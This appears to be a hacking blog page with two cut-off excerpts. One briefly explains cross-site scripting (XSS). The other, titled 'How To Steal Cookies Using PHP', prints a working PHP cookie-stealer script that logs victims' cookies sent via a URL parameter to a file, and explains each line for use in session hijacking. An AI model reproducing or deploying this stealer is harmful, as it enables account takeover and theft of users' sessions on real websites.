Cross Site Scripting(XSS)

What is XSS? Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.In a typical XSS attack, a hacker inject his malicious javascipt...

How To Steal Cookies Using PHP

Here is the simple Cookie Stealer code:Cookie stored in File: <?php$cookie = $HTTP_GET_VARS["cookie"];$steal = fopen("cookiefile.txt", "a");fwrite($steal, $cookie ."\\n");fclose($steal);?> $cookie = $HTTP_GET_VARS["cookie"]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.$steal = fopen("cookiefile.txt",...